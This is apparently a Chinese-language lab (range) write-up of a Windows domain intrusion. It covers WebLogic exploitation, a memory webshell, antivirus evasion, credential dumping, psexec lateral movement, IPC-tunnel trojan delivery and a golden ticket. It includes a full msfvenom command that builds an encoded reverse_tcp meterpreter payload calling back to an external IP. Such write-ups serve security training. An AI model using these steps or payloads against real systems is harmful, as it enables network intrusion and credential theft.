靶场拓补图
环境搭建
PC-双网卡机器
WEB服务器-双网卡机器
DC-域控机器
WEB服务器开启weblogic服务
解题流程
WEB
端口扫描
发现常见weblogic端口
针对端口进行漏洞扫描
对扫描结果进行漏洞利用
通过工具注入内存马,并连接
信息收集一波,该环境同样存在域
查看进程,存在360杀毒软件
传入正常fscan会被杀,于是传入appscan进行内网信息收集,得知域控机器
此时打算上cs马进行内网横向,发现无法运行
随上传之前构造的msf免杀马
运行
成功上线
因为存在杀软,立马查看进程进行进程迁移
想直接迁移到
360
进程上,无法成功,遂找了个
system
权限的进程直接迁移
成功后进行将会话转移到
CS
上
session
错了,设置正确
session
,成功派生至
cs
在
cs
中进行密码抓取
DC
前面已经定位到了
DC
因此直接扫描出内网存活主机后
通过抓取到的密码进行横向移动
横向流程:创建监听
-
选择
DC
机器
-
右键
psexec-
选择密码
-
监听
-
会话
-
运行
-
成功拿下
DC
权限
PC
此时内网还剩一台
10.10.10.201
没有拿下,这台机器开了防火墙,直接通过
cs
的
psexec
进行横移不成功,
已知开放了这些端口,且我们拥有域控密码信息,尝试另外一种上线方式,让跳板机
WEB
与
PC
建立
IPC
隧
道,在
WEB
上生成木马,通过
IPC
隧道传至
PC
,并设置定时任务运行,从而上线
PC
机器
通过之前抓取的密码,建立
IPC
隧道
查看隧道是否建立成功
创建监听
传至
WEB
机器
通过
IPC
隧道传至目标
PC
机
直接去目标机器执行了一下木马,是可以上线的,也许真实场景可以想办法的钓鱼让目标主动点击
..
再战
PC
黄金票据上线
可以通过欧拉插件进行黄金票据生成
需要获取到几个关键信息
krbtgt
账户的
hash
值
域控的
SID
输入参数,
sid
处需把
-500
删去
成功生成
查看
DC
文件
shell\\dc.de1ay.com\c$
因为
PC
机
win7
存在
360
,故打算上传
msf
生成的免杀马,再通过
msf
将会话转移至
cs
msf
生成木马
msfvenom-pwindows/meterpreter/reverse_tcpLHOST=124.71.152.11LPORT=80-e
x86/shikata_ga_nai-xnpp.exe-i15-f exe-o80-2.exe
到本地加个壳
使用
msf
的会话转移模块将会话传递至
cs
设置好参数
成功将会话转移至
CS
至此大满贯,全部上线完成
最后上线
PC
机器,流程是先
MSF
后
CS
,但这样操作的前提是建立在
PC
机器能出网的前提下
若目标机器无法出网,就得让同处于内网的跳板机,采取正向或者反向连接的方式进行上线了
建立隧道后,通过
PSEXEC
,
WEC
进行横向移动很方便,但是会被防火墙策略给拦下
CS
可以直接在跳板机上新建监听,然后转发上线,但生成的木马免杀有点难操作
还是有的整的